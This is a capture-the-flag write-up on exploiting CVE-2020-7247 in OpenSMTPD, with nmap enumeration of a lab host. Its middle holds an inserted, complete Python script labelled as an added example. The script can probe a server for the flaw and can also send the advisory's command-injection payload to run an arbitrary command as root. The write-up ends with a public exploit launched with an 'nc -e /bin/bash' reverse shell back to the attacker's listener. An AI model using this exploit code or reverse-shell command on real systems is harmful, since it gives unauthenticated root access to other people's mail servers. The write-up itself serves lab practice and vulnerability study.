root💀muzec-sec:~#

Hack. Sleep. Repeat


This target runs an OpenSMTPD instance vulnerable to CVE-2020-7247.

Description

A vulnerability discovered in OpenSMTPD, OpenBSD's mail server, has been exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an unauthenticated remote attacker to execute arbitrary shell commands as root. As described in the Qualys advisory, the flaw is in smtp_mailaddr(): a sender address (MAIL FROM) whose local part is invalid but whose domain part is empty is accepted without validation, and that local part is later interpolated into the mail delivery agent's command line, which is executed through the shell.

Enumeration With Nmap

nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33

# Nmap 7.91 scan initiated Sat Dec  4 09:26:10 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
Increasing send delay for 10.0.100.33 from 0 to 5 due to 230 out of 766 dropped probes since last increase.
Warning: 10.0.100.33 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.33 from 640 to 1000 due to 108 out of 358 dropped probes since last increase.
Nmap scan report for 10.0.100.33
Host is up (0.15s latency).
Not shown: 40969 closed ports, 24565 filtered ports
PORT   STATE SERVICE
25/tcp open  smtp

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec  4 09:27:14 2021 -- 1 IP address (1 host up) scanned in 64.35 seconds

As usual, run the default scripts and service detection against the open port.

nmap -sC -sV -oA nmap/normal -p 25 10.0.100.33

# Nmap 7.91 scan initiated Sat Dec  4 09:28:37 2021 as: nmap -sC -sV -oA nmap -p 25 10.0.100.33
Nmap scan report for 10.0.100.33
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.0.186], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP, 
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info 
Service Info: Host: CVE-2020-7247.echocity-f.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  4 09:28:45 2021 -- 1 IP address (1 host up) scanned in 7.42 seconds
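Note that nmap only identified the software, not its version: the "2.0.0" in the HELP output is an enhanced status code (RFC 3463), not the OpenSMTPD version. The following script, an added example that is neither the write-up's own code nor exploit-db 47984, covers the two things a practitioner wants at this point: a non-destructive check that the server accepts an invalid sender with an empty domain (the smtp_mailaddr() condition from the description above), and a builder for the exploit transcript published in the Qualys advisory, in which the injected local part makes sh read its real command from the message body. The host, port, HELO name (`probe.example`) and recipient (`root`) are placeholders to adjust.

```python
#!/usr/bin/env python3
"""Added example, not from the original write-up or from EDB 47984.

Talks raw SMTP to an OpenSMTPD instance to (a) check the CVE-2020-7247
condition without delivering anything and (b) build and send the exploit
transcript from the Qualys advisory.  Host, port and HELO are placeholders.
"""
import socket
import sys

# ';' fails valid_localpart(), and with no '@domain' the domain is empty, so a
# vulnerable smtp_mailaddr() takes the "no domain, local user" shortcut and
# accepts the address unchecked; 6.6.2p1 and later reject it.
PROBE_LOCALPART = ";"

# The advisory's payload. Each ';' ends a shell command once the address is
# interpolated into the MDA command line run by sh -c. The loop consumes the
# header lines OpenSMTPD prepends to the message, then sh reads the rest of
# stdin (our body) as its script, and exit 0 discards the trailing arguments.
INJECTED_LOCALPART = (
    ";for i in 0 1 2 3 4 5 6 7 8 9 a b c d e f;do read r;done;sh;exit 0;"
)
# Whatever the read loop does not consume is a plain comment to sh.
PADDING_LINES = ["#" + c for c in "0123456789abcdef"]


def is_last_reply_line(line):
    """Multi-line SMTP replies use 'NNN-' continuation; 'NNN ' ends them."""
    return len(line) < 4 or line[3] != "-"


def read_reply(rfile):
    """Read one complete SMTP reply and return it as a single string."""
    lines = []
    while True:
        line = rfile.readline()
        if not line:
            break
        lines.append(line.rstrip("\r\n"))
        if is_last_reply_line(line):
            break
    return "\n".join(lines)


def classify_mail_from_reply(reply):
    """2xx: the invalid, domain-less sender was accepted (vulnerable
    behaviour). 5xx: the local part was validated and refused (OpenSMTPD
    6.6.2p1+ answers 553 Sender address syntax error)."""
    code = reply[:3]
    if code.startswith("2"):
        return "accepted"
    if code.startswith("5"):
        return "rejected"
    return "unknown"


def build_exploit_session(cmd, helo="probe.example", rcpt="root"):
    """Return (envelope, body): envelope commands each get one reply; the
    body is sent after the 354 and ends with the '.' terminator."""
    envelope = [f"HELO {helo}", f"MAIL FROM:<{INJECTED_LOCALPART}>",
                f"RCPT TO:<{rcpt}>", "DATA"]
    if cmd.startswith("."):
        cmd = "." + cmd  # dot-stuffing so the line is not read as the end
    body = [""] + PADDING_LINES + [cmd, "."]  # empty line: no client headers
    return envelope, body


def probe(host, port=25, timeout=10):
    """Non-destructive check: MAIL FROM only, then RSET and QUIT, so no
    envelope is completed and the MDA never runs."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("r", encoding="latin-1")
        banner = read_reply(rfile)
        sock.sendall(b"HELO probe.example\r\n")
        read_reply(rfile)
        sock.sendall(f"MAIL FROM:<{PROBE_LOCALPART}>\r\n".encode())
        verdict = classify_mail_from_reply(read_reply(rfile))
        sock.sendall(b"RSET\r\nQUIT\r\n")
    return banner, verdict


def exploit(host, port, cmd, timeout=10):
    """Replay the advisory's transcript; returns every server reply."""
    envelope, body = build_exploit_session(cmd)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rfile = sock.makefile("r", encoding="latin-1")
        replies = [read_reply(rfile)]  # 220 banner
        for line in envelope:
            sock.sendall((line + "\r\n").encode())
            replies.append(read_reply(rfile))  # 250, 250, 250, then 354
        sock.sendall("".join(l + "\r\n" for l in body).encode())
        replies.append(read_reply(rfile))  # 250 ... message accepted
        sock.sendall(b"QUIT\r\n")
        replies.append(read_reply(rfile))
    return replies


if __name__ == "__main__":
    # usage: script.py HOST [PORT] [COMMAND]; without COMMAND it only probes
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 25
    if len(sys.argv) > 3:
        print("\n".join(exploit(host, port, sys.argv[3])))
    else:
        banner, verdict = probe(host, port)
        print(banner)
        print("invalid MAIL FROM was", verdict)
```

The probe never sends RCPT or DATA, so on a vulnerable host it only confirms the accept-without-validation behaviour; the exploit path delivers the command in the body precisely because the local part is length-limited and has some metacharacters escaped on the MDA path, which is why the advisory's payload is kept short and defers to sh reading stdin.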

A quick search turns up a public exploit for CVE-2020-7247 on Exploit-DB (EDB-ID 47984).

[image: Exploit-DB search result for CVE-2020-7247]

Let's run it, with a reverse shell back to our Ncat listener as the payload.

┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/CVE-2020-7247]
└─$ python3 47984.py 10.0.100.33 25 'nc -e /bin/bash 10.10.0.186 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Now let's check the Ncat listener.

[image: Ncat listener on port 1337 receiving the reverse shell]

We are done.

Greetings from Muzec
